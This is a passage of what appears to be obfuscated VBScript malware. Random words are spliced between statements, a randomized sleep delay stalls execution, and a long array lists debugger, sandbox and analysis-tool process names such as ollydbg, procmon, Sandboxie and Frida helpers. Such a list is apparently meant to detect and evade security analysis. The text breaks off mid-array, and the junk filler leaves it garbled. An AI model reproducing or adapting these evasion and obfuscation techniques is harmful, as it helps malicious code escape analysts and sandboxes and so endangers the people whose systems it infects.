nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe" |